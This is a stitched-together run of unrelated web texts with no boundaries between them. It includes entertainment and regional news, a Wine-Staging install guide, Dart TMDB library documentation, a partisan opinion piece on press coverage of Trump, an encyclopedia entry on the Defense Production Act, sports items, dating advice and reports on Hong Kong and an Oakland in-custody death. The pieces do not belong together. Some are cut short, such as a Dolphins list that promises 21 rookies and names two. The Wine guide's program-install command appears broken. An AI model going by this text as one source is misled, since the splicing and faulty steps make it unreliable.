Arcade Fire are working on a project with director Kahlil Joseph, who has previously worked with Flying Lotus and Kendrick Lamar. Joseph reportedly screened a raw edit for students at the California Institute of the Arts, as Arcade Fire Tube points out. According to Arcade Fire Tube, Joseph said that even the band hadn't seen the footage.
A Tweet from a CalArts professor seems to confirm that Joseph did screen the film at the school.
A clip of a live version of "Afterlife" (from last year's Reflektor) credited to Joseph appears on the website for Lux Artists, a company that represents filmmakers. You can watch that below. (That's a still, above.) It's different from the official video for "Afterlife", which was directed by Emily Kai Bock and released last year, as well as the YouTube Awards video starring Greta Gerwig and directed by Spike Jonze.
Lux Artists represents Lol Crawley, a director of photography. Crawley's resume lists a project called Arcade Fire: Reflektor Tapes directed by Joseph. Update: While Crawley shot part of the Reflektor Tapes film, Autumn Durald was the director of photography on the project and shot the video below.
Council merger process 'failed'; Premier Colin Barnett gave it 'best shot'
Updated
Plans to overhaul the local government sector have failed, concedes WA Premier Colin Barnett, as questions remain about whether the state will dump the entire reform process altogether.
The Government's plans to slash the number of Perth councils from 30 to 16 have been dealt a double body blow in recent days, with the WA Local Government Association (WALGA) yesterday withdrawing its support for the reforms and a poll at the weekend rejecting amalgamation plans.
Ratepayers in East Fremantle, Kwinana and South Perth voted against amalgamation, killing off three planned new districts in the Government's city-wide local government reform master plan.
Mr Barnett told 720 ABC Perth while he was disappointed by the result, he accepted it.
"I've got a responsibility to do all that we can to provide good government, we gave it and I gave it my best shot," he said.
"We failed and I concede that, we'll now focus on the City of Perth. I've failed, I've put up the white flag, move onto the next issue."
The ABC understands plans to amalgamate the cities of Perth and Vincent appear doomed, with the two failing to reach agreement on elements of the proposal.
There's a whole lot of loose ends here, it's symptomatic of a policy direction which I don't think should have been embarked upon, and it suffered the fate it had at the hands of voters that it deserved. Simon O'Brien
The Premier's office yesterday declined to respond to questions over whether the Government would now dump the reform process entirely in the face of mounting opposition.
This morning the Premier told the ABC he was yet to determine what will happen to the remaining metropolitan councils.
"We'll decide what we'll do with the others, I don't think the argument has changed," he said.
However, this afternoon he said he had put the entire process "on hold" for the foreseeable future.
Mr Barnett said local government was incapable of reforming itself and the process had been personally frustrating.
"I've spent an enormous amount of time and effort on this, as has the minister, as have various government departments," he said.
"I note people were claiming this morning a lack of consultation. You couldn't have consulted this issue more. There was meeting, after meeting, after meeting, including in my office."
'What's he run up with white flag on?'
Liberal backbencher Simon O'Brien said there were a number of unresolved questions.
"When I hear the Premier say he's run up the white flag, that's it, he'll just look at the City of Perth from now on, to me that's not clear what that means," he said.
"What is it that he's run up the white flag on and agreed not to continue with? Does it relate to the City of Canning where people weren't allowed a vote?
"What happens now that we're not going to have an amalgamation of South Perth and Vic Park to those people to the City of Canning that have been hived off?"
Mr O'Brien said he would be following up with the Premier.
"There's a whole lot of loose ends here, it's symptomatic of a policy direction which I don't think should have been embarked upon, and it suffered the fate it had at the hands of voters that it deserved," he said.
"There's been a lot of political goodwill and a lot of political blood spilt, for no good reason."
Kwinana mayor Carol Adams said she was "quite taken aback" by the Premier's comments.
"I had anticipated that the Premier would still proceed with those boundary changes, especially as they have already been gazetted," she said.
"I think we would probably just like to have a bit more dialogue from the Premier's office about exactly what that means for the sector, and where it leaves a lot of the councils who are still facing a little bit of uncertainty now."
Ms Adams said councils had spent a lot of money on the amalgamation process.
"We did a quick tally-up, and from 2009, we've put in about five reports, notwithstanding council officers' time, you'd have to be looking at $1.5 million conservatively," she said.
Ms Adams said the council would be writing to the Government seeking some reimbursement.
Attention turns to City of Perth Act
Mr Barnett said the only way to change the council merger process was to change the Local Government Act itself.
"At the end of the day the Act is too cumbersome, people argued to keep the Dadour provisions [right to vote] and that basically brought about this result, but that's life, we move on," he said.
The Premier said he would now turn his focus to the City of Perth Act, which would expand the city's boundaries to include key landmarks like Kings Park.
However with the WA Nationals, Labor and the Greens all vowing to block the legislation in the Upper House, Colin Barnett would need to convince at least one of the parties to support the Act, or it would inevitably fail.
Yesterday, the Nationals leader Terry Redman said there was little the Premier could do to convince his party to back the legislation.
"I think it's unlikely that there's anything that we could be offered that would convince us to support that position," he said.
"We've taken a very, very strong view. We've had a planning meeting with my parliamentary team on Friday and that view is consistent coming out of that room."
Mr Redman said that view reflected the strong opposition to council amalgamations in country areas.
"We've always taken our position, we'll play our cards as we see fit, in support of regional West Australians," he said.
"And we believe that's a very, very strong view in regional Western Australia, and we're going to stay consistent with that."
Topics: local-government, perth-6000
First posted
LOS ALAMITOS – A new high school advanced placement class that addresses global warming has prompted the school board to start requiring teachers to present opposing views in courses that include controversial topics.
Los Alamitos Unified School district trustees unanimously agreed to update the policy on controversial issues at the request of board member Jeffrey Barke, who said he is concerned about “global warming dogma” and wants students to be offered a balanced perspective on the topic.
“There are two clearly divergent opinions on global warming,” Barke said in an interview. “There are those who believe that global warming is a fact, created by man's impact on the environment and the consequences will be devastating. There are others on the conservative side who believe it's much ado about nothing. It's overhyped and politically motivated, and the science is not solid, and there's room for more studies.”
Since news of the board's decision was posted on a numerous national blogs, Barke said he has received more than 100 e-mails criticizing the district's move and attacking him personally.
Los Alamitos resident J.M. Ivler, who has a daughter at the high school, did not e-mail Barke, but he was critical of the school board.
“There is consensus in the field that we have global warming happening, it is getting warmer and it is related to what we are doing to the planet,” he said. “That is not in dispute in the scientific community. It is in dispute in the political community. This is a science class. Teach science.”
The school board Tuesday voted 4-0 to update its policy to include a provision that will require the teacher of a course with controversial material to provide an annual update to the board, detailing “how multiple perspectives” will be taught. The policy allows material that represents “a balance of viewpoints and encourages students to examine each side of the issue.” Los Alamitos Unified serves students mostly from Seal Beach, Los Alamitos and Rossmoor.
“When you are teaching children, you need to present education in the broadest terms possible. I truly believe that,” Trustee Meg Cutuli said Friday. Cutuli said she believes global warming is a scientific phenomenon. Other board members voting for the change were David Boyer, Diana Hill and Karen Russell.
Barke was not at the meeting but the changes were discussed in previous meetings, when the board talked about the new AP environmental science course. Barke said he would not be comfortable agreeing to the new class unless a balanced approach was presented.
Parents did not address the board at any of the meetings on either the new class itself or the idea of offering a balanced approach to the course, board members said.
By Friday, the headline on a Huffington Post blog read “California Struggles to Out-Dumb Texas.” The column by Bill Allen, the former editor-in-chief of National Geographic, is a reference to Texas' decision to revise its textbooks and to present different sides on the subjects of evolution and global warming.
Seal Beach resident Penny Homan-Muise, who has three daughters in the district, said she's concerned the new policy language is too vague and could open the door to religion in the schools.
“This kind of verbiage has been slipped into several Southern state school policies with an underlying focus to get history revisions, using this kind of speak to introduce intelligent design,” Homan-Muise said.
There have been moves in various states to ensure that dissenting views on scientific subjects, including global warming and evolution, be included in public schools. In South Dakota, for example, the Legislature passed a resolution calling for the “balanced teaching of global warming in public schools” last year.
In California, then-state Superintendent of Public Instruction Jack O'Connell took a stance in 2005 to defend California's science standards against including the theory of intelligent design in natural science classes.
In Orange County, officials with the county School Boards Association said they had not heard of any efforts in local school districts to offer balanced teachings on global warming or other issues.
“It's a good example of local control,” said Suzie Swartz, president of the association and a school board member of the Saddleback Valley Unified School Board. Swartz emphasized that all classes must still teach to state standards.
Across California, more than 15,000 students took the AP environmental science class in the 2008-09 school year, said Tom Adams, a director with the California Department of Education. The state provides the standards and the instructional materials and leaves it up to the districts how the course is taught, he said.
In the Irvine Unified School District, for example, the class is taught in at least one of the high schools and it has not created any controversy, said district spokesman Ian Hanigan.
“Global warming is taught in our schools, not in terms of taking a position of advocacy, (but from the) position of ‘Here's what the data shows,'” Hanigan said. “The data is the data.”
Irvine Unified also has a “controversial issues” policy. Asked whether the AP environmental science class falls under the district's policy, Hanigan said: “The way we teach it is not controversial. It's based on what the data is showing. It's not coming from any one position.”
Los Alamitos High teacher Gordon MacDuff said he was surprised by all the attention for the planned course, which will be offered in four classes next fall. MacDuff met with the current and incoming superintendents of the school district earlier this year, at their request, to discuss the district's policy. He said he has no problems with presenting information in “an unbiased fashion and let the students make up their own minds.”
“I want to present just the science behind the issues and go from there. I won't spin it in one way or another. I will just present it and let the students use their brains,” MacDuff said. “It's environmental science, not environmental studies.”
Barke, a doctor who has a practice in Newport Beach, said he is a Republican and his conservative political leanings come into play “from time to time” but not on this subject.
“On this particular issue, I'm not pushing my view. I just want the kids to be presented with balance.”
A policy on controversial issues at Los Alamitos Unified has been on the books for years, officials said. It describes a controversial issue as “a topic on which opposing points of view have been promulgated … (and) are likely to arouse both support and opposition in the community.”
New language added to the policy states the school board will identify the courses in which an annual update is required.
Sherry Kropp, the incoming superintendent for the school district, said Friday that she does not expect there will be an official list, but board members may on occasion ask to hear a presentation on a new class.
Contact the writer: fromroxana@gmail.com
Most of the Linux users are already aware of the well-known application Wine, which runs Windows operating system programs on Linux operating system. Wine is popular and useful application and all Linux distributions support it. Wine makes interoperatability possible between Linux and Windows apps. Wine Staging, as the name suggests, is a special wine version which consists of bug fixes and features, which are still in staging (testing) state and not yet available in regular wine versions. Such bug fixes or features are almost finalized from developer's end but they still need to be tested properly before shipping them to regular wine version. The purpose of this awesome tool is to give users features and bug fixes faster, and for developer's point of view its an opportunity for them to discuss and improve their packages before shipping them to regular wine release.
Installing Wine-Staging
Lets see how we can install wine-staging on Ubuntu 15.04, same set of instructions works for Linux Mint 17.1 as well.
First of all, launch your terminal and add PPA repository for Wine-Staging to package manager.
sudo add-apt-repository ppa:pipelight/stable
Since a new repository has been added , we will need to update APT package manager by running the following command:
sudo apt-get update
Alright, our Ubuntu system is ready to install wine-staging, run following command to install it.
sudo apt-get install --install-recommends wine-staging
That's all, you should be able to install the latest programs using this tool
How to install applications using wine-staging
The method to install programs using wine-staging is a bit different, first of all, find out the location of wine-staging binary on your ubuntu system by running following command:
whereis wine
Typical output should look like as shown in following screenshot:
In order to install programs using wine-staging, run command as:
/opt/wine-staging/bin/wine install PROGRAM-NAME
Replace “PROGRAM-NAME” with the name of the program/app you are going to install.
Conclusion
Using Wine-Staging you can try the most updated version of programs on your Linux distribution. The other side of picture is that such program might have unknown issues, so in order to try such program, you should understand the risks and backup your system and important data before proceeding.
A TheMoviedb.org (TMDB) library for Dart.
Access to all API methods
Support for both console ( dart:io ) and web ( dart:html ) applications
) and web ( ) applications User authentication, either with a username and password (obtains new session ID) or with a previously obtained session ID
You need to provide your own API key
See the full documentation.
First import the proper library for the platform.
If your code is running on the Dart VM (where you'd use dart:io ) then:
import 'package:tmdb/io.dart';
If your code runs on the browser (where you'd use dart:html ) then:
import 'package:tmdb/html.dart';
With the library imported you can just create a new instance (providing your API key) and access all of its methods.
For example, a simple console application to get the top rated movies would look like this:
// Import the proper library import 'package:tmdb/io.dart'; main() async { // Create a new TMDBApi instance TMDBApi tmdb = new TMDBApi('YOUR_API_KEY_HERE'); // Get the top rated movies Map topRated = await tmdb.movies.getTopRated(); // Loop through the results and print the title, year, and rating topRated['results'].forEach((v) { var title = v['title']; var year = DateTime.parse(v['release_date']).year; var rating = v['vote_average'].toStringAsFixed(1); print("$title ($year) * $rating/10"); }); }
If you already have a valid session ID for the user, you can just feed it to the library and start using any method that requires authentication:
// Create instance TMDBApi tmdb = new TMDBApi('YOUR_API_KEY_HERE'); // Set the session ID tmdb.authentication.sessionId = 'SESSION_ID_HERE'; // Get the user's information var info = await tmdb.account.getInfo();
If you don't have a session ID for the user you want to authenticate you can easily obtain one using the login method.
// Create instance TMDBApi tmdb = new TMDBApi('YOUR_API_KEY_HERE'); // Log in with a username and password await tmdb.authentication.login('USERNAME_HERE', 'PASSWORD_HERE'); // The session ID is now stored in tmdb.authentication.sessionId // so you can start using any API method. // SAVE THE SESSION ID FOR FUTURE USE. // Get the user's information var info = await tmdb.account.getInfo();
IMPORTANT: You should only use the login method once for each user because the API will generate a new session ID every time you do so. Once you have obtained it you should save it somewhere safe and feed it to the library whenever you need to (which is usually right after calling new TMDBApi() ).
Futures vs async/await #
The easiest way to call the API methods is using the async/await syntax provided by Dart, like on the examples above.
To use it you just need to add the async modifier to the function that will be calling the asynchronous methods from this library. Then, prefix the actual call with await .
printMovieInfo(id) async { var info = await tmdb.movies.getInfo(id); print(info); }
Or even
printMovieInfo(id) async { print(await tmdb.movies.getInfo(id)); }
If for any reason you can't or don't want to use async/await, you can just use the Futures directly:
printMovieInfo(id) { tmdb.movies.getInfo(id).then((info) { print(info); }); }
Features and bugs #
Please file feature requests and bugs at the issue tracker.
Over the weekend, the New York Times published a story on Republicans who supposedly are angling for their party's 2020 presidential nomination: “Republican Shadow Campaign for 2020 Takes Shape as Trump Doubts Grow.” The story was, of course, part of the paper's daily war on President Trump. Its purpose was to cause “doubts” about President Trump's being the GOP nominee in 2020 to “grow.”
The Times article contains no actual news. It quotes a handful of people speculating about the motives of Republicans like Mike Pence, John Kasich and Tom Cotton who are–can you believe it?–attending political events around the country:
Senators Tom Cotton and Ben Sasse have already been to Iowa this year, Gov. John Kasich is eyeing a return visit to New Hampshire, and Mike Pence's schedule is so full of political events that Republicans joke that he is acting more like a second-term vice president hoping to clear the field than a No. 2 sworn in a little over six months ago.
Vice President Pence responded furiously to the Times's claim that he wants to replace Trump on the ticket in three years:
“Today's article in The New York Times is disgraceful and offensive to me, my family, and our entire team,” Pence's statement read. The statement went on to say the suggestion that Pence was not working solely for Trump's agenda and re-election was “laughable and absurd.”
As for Senator Cotton, does the Times think he needs to boycott Iowa for four years? He was in Minnesota earlier this Summer, too, but of course that doesn't count since Minnesota isn't an early primary state. Then there is this:
Mr. Cotton, for example, is planning a two-day, $5,000-per-person fund-raiser in New York next month, ostensibly for Senate Republicans (and his own eventual re-election campaign).
“Ostensibly.”
When is speculation news? When it gives the Times an opportunity to promote its agenda. That is what turns anonymous leaks into news, too.
President Trump responded furiously to the Times's implication that he is likely not to be on the ballot in 2020:
The failing @nytimes, which has made every wrong prediction about me including my big election win (apologized), is totally inept! — Donald J. Trump (@realDonaldTrump) August 7, 2017
The Trump base is far bigger & stronger than ever before (despite some phony Fake News polling). Look at rallies in Penn, Iowa, Ohio……. — Donald J. Trump (@realDonaldTrump) August 7, 2017
There was considerably more in the same vein. This led to a tag-team attack by the Washington Post: “Trump says base is ‘stronger than ever' despite polling to the contrary.”
President Donald Trump took to Twitter on Monday morning to declare that his political base is “bigger & stronger than ever before” despite recent polling — which he branded “fake” — that shows a drop-off in support.
***
A poll last week from Quinnipiac University found that just 33 percent of voters overall approve of Trump's job performance, a new low. Notably, support among white voters without a college degree — a key Trump demographic — had fallen off as well.
This is what passes for a “news cycle” nowadays. Attacks on Trump that are often disconnected from any actual news, a response by the president, and attacks on the response. It is all part of the Democrats' effort to drive Trump from office.
The Defense Production Act (Pub.L. 81–774) is a United States federal law enacted on September 8, 1950, in response to the start of the Korean War.[1] It was part of a broad civil defense and war mobilization effort in the context of the Cold War. Its implementing regulations, the Defense Priorities and Allocation System (DPAS), are located at 15 CFR §§700 to 700.93. Since 1950, the Act has been reauthorized over 50 times.[1] It has been periodically amended, and remains in force as of 2019.[2]
Provisions [ edit ]
The Act contains three major sections. The first authorizes the President to require businesses to sign contracts or fulfill orders deemed necessary for national defense. The second authorizes the President to establish mechanisms (such as regulations, orders or agencies) to allocate materials, services and facilities to promote national defense. The third section authorizes the President to control the civilian economy so that scarce and/or critical materials necessary to the national defense effort are available for defense needs.[3]
The Act also authorizes the President to requisition property, force industry to expand production and the supply of basic resources, impose wage and price controls, settle labor disputes, control consumer and real estate credit, establish contractual priorities, and allocate raw materials towards national defense.[3]
The President's authority to place contracts under the DPA is the part of the Act most often used by the Department of Defense (DOD) since the 1970s. Most of the other functions of the Act are administered by the Office of Strategic Industries and Economic Security (SIES) in the Bureau of Industry and Security in the Department of Commerce.[4]
The Defense Priorities and Allocations System institutes a rating system for contracts and purchase orders.[5] The highest priority is DX, which must be approved by the Secretary of Defense. The next level down is DO, and below that are unrated contracts.
Usage over time [ edit ]
Korean War-era usage [ edit ]
The DPA was used during the Korean War to establish a large defense mobilization infrastructure and bureaucracy. Under the authority of the Act, President Harry S. Truman established the Office of Defense Mobilization, instituted wage and price controls, strictly regulated production in heavy industries such as steel and mining, and ordered the dispersal of wartime manufacturing plants across the nation.[6]
The Act also played a vital role in the establishment of the domestic aluminum and titanium industries in the 1950s. Using the Act, DOD provided capital and interest-free loans, and directed mining and manufacturing resources as well as skilled laborers to these two processing industries.[7]
Cold War–era usage [ edit ]
The DPA was used sporadically during the Cold War.[8]
Tool for innovation [ edit ]
Beginning in the 1980s, DOD began using the contracting and spending provisions of the DPA to provide seed money to develop new technologies.[9] Using the Act, DOD has helped to develop a number of new technologies and materials, including silicon carbide ceramics, indium phosphide and gallium arsenide semiconductors, microwave power tubes, radiation-hardened microelectronics, superconducting wire, and metal composites.[7]
21st-century usage [ edit ]
In 2011, it was reported that the law was invoked to force telecommunications companies, under criminal penalties, to provide detailed equipment outlines to the Commerce Department's Bureau of Industry and Security.[8] In June 2017, President Donald Trump asked to adequately provide critical technology in the space industrial base in a timely manner Pursuant to Section 4533(a)(5) of the act[10][11] and to adequately provide critical technology in a timely manner Pursuant to Section 4533(a)(5)) of the act.[12][13]
References [ edit ]
Sources [ edit ]
AMES, Iowa -- While everyone focused on the debut of Michigan's Mitch McGary, it was easy to forget that Iowa State got Melvin Ejim back too.
In a matchup of returning stars, Ejim outshone McGary and led the Cyclones to one of their biggest wins under coach Fred Hoiberg.
Ejim returned after missing two games with a hyperextended knee to score a game-high 22 points and Iowa State beat No. 7 Michigan 77-70 Sunday.
Naz Long added 16 for the Cyclones (3-0), who closed the game on a 23-10 run and held McGary to just one point in the second half.
"Melvin, I can't say enough about him. I told him in my office (Saturday), `If you do get the green light, I'm going to gradually ease you back into this thing -- and I think I took him out for two minutes in the second half. Pretty big-time performance from Mel," Hoiberg said.
McGary, a preseason first-team All-American who missed two games with a lower back injury, finished with nine points, six rebounds and four steals in 22 minutes.
"It was good to be back. Trying to find the right chemistry on the court. Typical first game, trying to find the right group of guys, try to feel it out and have a good feel on the floor," McGary said.
Nik Stauskas led Michigan (2-1) with 20 points and Derrick Walton Jr. had 13. Glenn Robinson III was held to 12 points on 4 of 14 shooting.
Michigan was just 8 of 29 from 3-point range and 4 of 9 on free throws.
"We did not execute the way we had to. They changed a little bit of pressure on their defense and blew up a couple of plays and we panicked a little bit. Out of that still...we had really good shots. They just didn't go down," Michigan coach John Beilein said.
Communication is vital to build up any long term relationship. Without it, you're mostly going off of lust, which stays lit until a drizzle of wind blows it out.
When summing up the courage to speak to someone you're interested in, it's tricky because you're wondering what to do and say. You don't want to make yourself out as a clown when speaking to someone, but don't want to come off as boring either. You just want to say the right words to charm them into your life and possibly gain a friend or lover.
I recently read an article titled, “To Fall in Love with Anyone, Do This.” The title struck me as fascinating and the passage following it blew my mind because it related to psychology and love. It was about a woman who applied psychologist Arthur Aron methods to falling in love with anyone.
In it, she mentions how she followed his routine of procedures with another person, eventually falling heavily attracted to him.
But what I found most fascinating about the article was how possible it was for people to simply fall in love by asking genuine questions. Though physical attraction is the appeal most people go by, once you push past that obstacle, it makes it extremely easier to have someone fall in love with you.
What happens when you ask someone a series of personal questions is that they can't help but find a deeper attraction for you. That's because people are naturally defensive when it relates to personal feelings and by sharing their vulnerabilities with you, it tricks them into believing you're connected to their life.
The more they reveal what's hidden inside their mind, the more they naturally start to feel connected with you. It'll be like two people sharing deep secrets with each other.
What normally happens when you're out with someone is that you both only relate to each other regarding the things that are going on that moment. Though social interactions that way could be efficient when getting to know someone better, it doesn't trap you inside their mind.
You'll only be a short term memory they have such as the time they went to an amusement park or arcade. What happens is that if you both are mainly focused on what's going on at the movies, a concert, or at the park, you're only settling for temporarily emotions.
To truly connect with someone, you need to ask them questions that's challenging, thought provoking, and something they wouldn't answer to the typical stranger. You want to make them question their own values without challenging their thoughts or beliefs.
Through this practice, a stronger bond will form between you and the other person. Rather than being the person who gave them temporarily emotions, you'll be the stone that connects you with their very soul.
Holding a genuine conversation is difficult when you have nothing to offer, but it's a lot easier than you think. Rather than choosing to avoid the person or fear saying something silly to your date or love interest, I've gathered a list of 30 things to say when conversing with new people. Each question is meant to be fun, and related to their past experiences.
Feel free to tell someone you meet at Starbucks or in your class one of these lines. But for these questions to truly be effective upon the listener's mind, it's best to have at least ten minutes of one-on-one conversation with them.
Try having them answer at least 3 – 4 questions from this list to trigger a closer connection with you. By then, the other person you're speaking to will be more inclined to either give you their number, speak to you again in the future, or start a relationship with you to some degree.
30 Questions To Have Someone Attracted To You
1. What restaurant give you the best memories based on what happened in the past? (I remember spending quality time with my two BFFs at Home Town Buffet and family.)
2. If you could tell your past self only one thing that you know now, what would it be?
3. What weird song do you like to listen to secretly?
4. If you could become any animal for one day, what would it be and why?
5. Have you ever suspected if your toys came alive when you weren't looking at them?
6. What country would you like to visit if given the chance for one month?
7. Have you ever met a famous person and if not, would you want to?
8. What's the worst thing someone caught you doing?
9. What was one of the proudest challenges you accomplished?
10. Are there any cartoons you still like to watch (excluding the Simpsons, Family Guy, or any adult cartoons.)
11. If you didn't have to worry about money, what would you do with your life?
12. What's the scariest movie you've ever seen?
13. What's one thing you don't like about yourself?
14. What's the last skill you learned how to do?
15. What do you think about children behavior these days?
16. How long do you think you'll be able to last without your cell phone, internet, and social media?
17. What's something you've been scared of since you were a child?
18. What's your biggest life goal right now?
19. What is your dream job?
20. If you were forced to live somewhere else in the world, where would it be?
21. Do you think aliens or any lifeforms outside Earth exist?
22. If you could gain one ability that wasn't supernatural,(i.e. super speed, flying, or heat vision) what would it be?
23. What would you consider to be a perfect day?
24. Would you like to be famous and if so, why?
25. How do you feel about the relationship with your family?
26. What's an embarrassing moment from your life?
27. What's your definition of friendship?
28. How would you define family values and commitment?
29. When was the last time you did something for yourself?
30. Do you like to sing to yourself when you're alone?
Antenna TV now reaches 88 percent of TV households in the U.S. after signing on with 26 new stations.
The Tribune-owned digital multicast channel has signed agreements with Sinclair Broadcasting, TEGNA Media, Red River Broadcasting, Deerfield Media and Gocom Media.
“In the four years since Antenna TV has launched there has been a great response from viewers enjoying the classic programming and from stations seeing an increase in revenue,” said Sean Compton, president Strategic Programming and Acquisitions at Tribune Broadcasting. “This latest round of affiliates adds 16 million additional households to Antenna TV's reach and we are looking forward to continued growth for the network.”
Antenna airs shows like I Dream of Jeanie, Bewitched, Newhart, Family Ties and Doogie Howser, MD.
Antenna now airs on WPGH in Pittsburgh, WNUV in Baltimore, WZTV in Nashville, WSYX in Columbus, Ohio, WSTR in Cincinnati, WLOS in Greenville-Spartanburg, WTCN in West Palm Beach, WTTO in Birmingham, WTLV in Jacksonville, KTHV in Little Rock, KTUL in Tulsa, WKEF in Dayton, WCHS in Charleston-Huntington, WLUK in Green Bay, WSMH in Flint, Mich., WUHF in Rochester, N.Y., WMNT in Toledo, Ohio, WLTX in Columbia, S.C., WCSH in Portland-Auburn, Maine, WRSP in Champaign, Illinois, KCEN in Waco, Texas, WTGS in Savannah, Ga. KDLT in Sioux Falls, S.D, KVRR in Fargo and KQDS in Duluth.
Comments
While the official start isn't until July 27 for the Miami Dolphins, their rookies will report to training camp on July 20. Not only did the Dolphins select seven rookies in this year's draft, but the team also signed 14 rookie free agents shortly after the draft.
Here are the 21 rookies that will report to Davie on Thursday:
Charles Harris, DE
Dolphins selected Charles Harris with their 22nd overall pick in the first round of the draft. Harris will join a defensive end rotation that has Pro Bowler Cameron Wake, Andre Branch and William Hayes. At Missouri, Harris recorded nine sacks and 12 tackles for loss in 2016.
Raekwon McMillan, LB
Raekwon McMillan played middle linebacker at Ohio State, but he will likely play as an outside linebacker with the Dolphins. In his junior season at Ohio State, McMillan racked up 102 tackles, seven tackles for loss and two sacks.
HONG KONG (Reuters) - Former Hong Kong leader Tung Chee-hwa said on Tuesday tough Chinese national security laws could be introduced in Hong Kong, stoking fears China may tighten control in its southern financial hub after last year's pro-democracy street protests.
Former Hong Kong Chief Executive Tung Chee-hwa addresses a news conference in Hong Kong September 3, 2014. REUTERS/Xaume Olleros/Pool
Pro-Beijing politicians and left-leaning newspapers have called for China's draconian national security laws - used by Communist Party authorities to crush dissent - to be implemented in Hong Kong after last year's civil disobedience campaign.
Tens of thousands of student-led protesters camped out on major roads for over two months in a push for direct elections without Chinese curbs.
Hong Kong, a former British colony, returned to Chinese rule in 1997 and enjoys wide-ranging freedoms under a so-called “one country two systems” arrangement. Beijing has allowed elections for choosing the next chief executive, but wants to screen candidates first.
Chinese leaders, including President Xi Jinping, were openly mocked in banners and posters during the street campaign for trampling on the city's freedoms.
“In the Basic Law, the central government has the power to take Chinese laws and introduce them into Hong Kong,” Tung told reporters, referring to the city's mini-constitution, when asked whether China's national security laws should be implemented.
Some legal scholars have said such a move would breach Hong Kong's autonomy.
Tung, the first Hong Kong chief executive after the 1997 handover, has close ties to Xi and is technically a national leader as deputy chairman of the country's highest consultative body, the Chinese People's Political Consultative Conference.
Tung tried to push through so-called “Article 23” national security laws in 2003, but the proposal, which many saw as a grave threat to the city's autonomy, provoked a mass protest and the laws were shelved.
Article 23 of the Basic Law states that Hong Kong should enact its own laws to “prohibit any acts of treason, secession, sedition, subversion” against the Chinese government.
Tung reiterated Hong Kong had a responsibility eventually to enact Article 23 laws to protect the interests of a rising China.
“This is not a question of time, the (Article 23) laws will be enacted one day,” he told reporters.
On Sunday, senior Hong Kong and mainland officials including incumbent Hong Kong leader Leung Chun-ying and his wife, inaugurated a new “army cadet group” modeled on China's People's Liberation Army (PLA).
The official China Daily newspaper showed photographs of young cadets marching at a PLA army base in Hong Kong, wearing green PLA-style uniforms.
Democratic lawmakers slammed the move as a sign of a Beijing's hardline, post-protest campaign of creeping control to counter the youth-led democracy movement by “brainwashing' students through military training.
Canalside's transformation into a major downtown attraction has come with a hefty price tag.
Erie Canal Harbor Development Corp. over the past three years spent $4.8 million to operate the waterfront area, such as putting on a free summer concert series, maintaining the ice rink, subsidizing food stands, hiring security and making repairs. Money came from the New York Power Authority through an agreement struck with the state waterfront agency in 2010.
The net operating loss of $1.4 million budgeted for the 2016-2017 season was less than the nearly $1.7 million loss the previous year, and $1.6 million the year before that.
The agency's goal is for Canalside to become self-sufficient, said Tom Dee, Erie Canal Harbor's president. He hopes to reach that break-even point in five to seven years.
Dee described the operating losses as "operating costs" necessary to build up Canalside and put it in a position to be self-sustaining. And over the past three years, the amount of physical space managed and the numbers of events have grown.
"We have doubled, tripled and quadrupled our footprint," Dee said, including HarborCenter and One Canal Center, which houses Courtyard Marriott and two other tenants, and the activation of the Aud block canal used for ice skating.
"That means you have to manage that much more space, and while we've done that, we have increased the amount of events and things for the public to enjoy."
The agency this week begins interviewing candidates to manage the site after the current three-year agreement expires in March 2017. Known bidders are Spectra, the current operator owned by Comcast Spectacor of Philadelphia, and Be Our Guest, a Bisons subsidiary and part of the Buffalo-based Rich Products Corp. that last year took over event planning for the Outer Harbor. It also is partnering with previous Canalside manager Buffalo Place for the Canalside contract.
Spectra are paid a $120,000 base fee each year, with some incentives to earn more.
Erie Canal Harbor's board expects to make a decision in December or January.
"We're counting on whoever is selected to lead us into a sustainable future," Dee said. "At some point, our goal would be to get to a breaking-even point where controlling the expenses through product sales, merchandise sales and revenues through sponsorships would be sufficient to cover expenses in terms of programming."
Dee said he hopes property owners within the canal district will eventually pay the bulk of the operations and maintenance costs. With that goal in mind, he hopes to see a request for proposal for development on the south Aud block sometime in the first quarter of next year. That could be followed by a second request for proposals for the north Aud block, after a study is completed on the best layout for the space.
A train station has also been discussed for that site, and Dee said such a station could "work hand in hand" with other development, with a lobby on the ground level and a boarding platform on the lower level. The RFP could be written, he said, seeking someone familiar with or experienced in integrating a train station into a larger development.
There are some positive developments concerning revenue.
Sponsorships grew from $466,253 in 2014-2015 to $713,587 in the current budget.
Event revenue from rentals nearly tripled in three years, from $129,363 to $459,491.
And event food and beverage revenue climbed from $837,853 to an anticipated $1.4 million this year.
At the same time, expenses for third-party events more than doubled over the past two years to $445,840. The Thursday concert series expenses are also projected to climb from $862,813 in 2015-2016 to $1.946 million for the current year. Dee attributed some of the costs to increased personnel and security.
The waterfront agency and various partners are discussing changes to the concert series, which could boost revenue and lower maintenance costs. The changes include instituting age limits or charging a low admission charge.
Dee said he sees progress in reducing costs and increasing revenue, and expects that trend to continue.
"The numbers are going down each year, and we want to continue that path," Dee said.
Man dies after Oakland police use stun gun to detain him
A police car blocks the street as Investigators with the Oakland Police Department gather evidence at the scene of a double homicide on the 1600 block of 72nd Avenue on Tuesday Oct. 2, 2012 in Oakland, Calif. Theses killings mark the fourth during a 24 hours period in Oakland. less A police car blocks the street as Investigators with the Oakland Police Department gather evidence at the scene of a double homicide on the 1600 block of 72nd Avenue on Tuesday Oct. 2, 2012 in Oakland, Calif. ... more Photo: Mike Kepka / The Chronicle 2012 Photo: Mike Kepka / The Chronicle 2012 Image 1 of / 28 Caption Close Man dies after Oakland police use stun gun to detain him 1 / 28 Back to Gallery
A man who allegedly tried to flee the scene of a car crash died while in the custody of Oakland police Thursday after officers used an electronic stun gun to detain him, officials said.
Police were called to the scene of a multiple-vehicle collision on the 4100 block of Foothill Boulevard, near San Antonio Park, at 2:21 p.m. The man who later died was “identified as being involved” in the crash and trying to leave the area, police officials said.
“The man was being physically resistant while the officers were attempting to arrest him,” a statement from the Police Department read.
Police used a Taser on the man, arrested him and requested paramedics, officials said. The man was transported to a nearby hospital, where he later died.
His name and age were not released.
Oakland homicide detectives and the department's Internal Affairs Division are investigating the circumstances of the death, and the Alameda County District Attorney's Office is conducting a parallel investigation, officials said.
The county coroner's office has not yet determined the cause of the man's death.
In-custody deaths and use-of-force instances by Oakland police have dramatically declined in recent years. There were no officer-involved shootings by the department in 2014 or 2016. The most recent case happened in February, when a police officer shot and killed 32-year-old Jesse Enjaian, who had opened fire on residents, cars and officers.
The issue over whether officers should carry stun guns has been debated in nearby Berkeley and San Francisco, whose police unions have lobbied for the equipment. Community groups have opposed the stun guns.
